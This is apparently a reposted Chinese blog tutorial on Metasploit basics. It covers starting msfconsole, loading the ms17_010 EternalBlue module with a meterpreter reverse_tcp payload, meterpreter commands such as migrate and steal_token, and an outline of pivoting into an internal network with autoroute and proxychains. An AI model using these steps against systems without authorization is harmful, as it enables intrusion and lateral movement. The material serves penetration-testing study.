标签：脚本 run 基础 会话 模块 使用 msf meterpreter

前言

msf是后渗透神奇，在kali中已经内置有。

1.1 基础使用
metasploit程序需要使用postgresql数据库

手动启动数据库：

service postgresql start

设置成开机启动数据库：

systemctl enable postgresql

启动msf

msfconsole

1.2.查找模块

search 模块名
//比如我要找永恒之蓝 search ms17_010

使用那个模块 use 模块名或use 前面的数字都可以

1.3使用模块

#查看要设置的参数
show options
#查看模块详情
info
#设置载荷  有很多可以自行选择
 set payload windows/x64/meterpreter/reverse_tcp

#运行模块
run 或者 exploit

1.4.命令行模式的一些基础操作
输入help可以查看支持的操作，但是乱码了，莫慌，可以解决。

输入 chcp 65001

乱码没有了

核心后台脚本：

​		bgkill       关闭一个后台的meterpreter脚本

​		bglist	   列出所有正在运行的后台脚本

​		bgrun	   将一个meterpreter脚本以后台线程模式运行

​		channel   显示或者控制一个活动频道

​		close 		关闭一个频道

​		exit			终止meterpreter会话

​		get_timeouts	获得当前会话的timeout值

		getuid			查看当前权限

​		help			帮助菜单

​		info 			显示post模块信息

​		irb				进入ruby脚本模式

​		load			加载meterpreter扩展

​		migrate	   将会话迁移到一个指定PID的进程

​		quit			 结束meterpreter会话

​		read			从频道中读取数据

​		resource	运行文件中的命令

​		run 			执行一个meterpreter脚本或者post模块

​		sessions    快速地切换到另一个会话

​		background	切换到后台

		run checkvm  查看是否是虚拟机

		steal_token 伪造身份

伪造身份：

2.1实战演示

• 通过永恒之蓝拿到跳板机
  
• 拿到跳板机之后添加路由
  

添加攻击IP添加到目标机路由表中

也可以 run autoroute -s 10.10.10.0/24

或者手动添加

route add 10.10.10.0 255.255.255.0

• 接下来设置代理
  

接下来用kali上的神奇proxychains

vi /etc/proxychains.conf

测试是否能连内网的机器

可以成功连接
通过代理工具开启msf

接下来就可以直接搞内网了。实战中可能有多层网段。就需要挂多层代理

msf中有很多 攻击载荷模块，嗅探模块和后渗透模块。大家后期可以深入的去研究研究。

标签：脚本,run,基础,会话,模块,使用,msf,meterpreter
来源： https://blog.csdn.net/qq_46804551/article/details/116381087

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。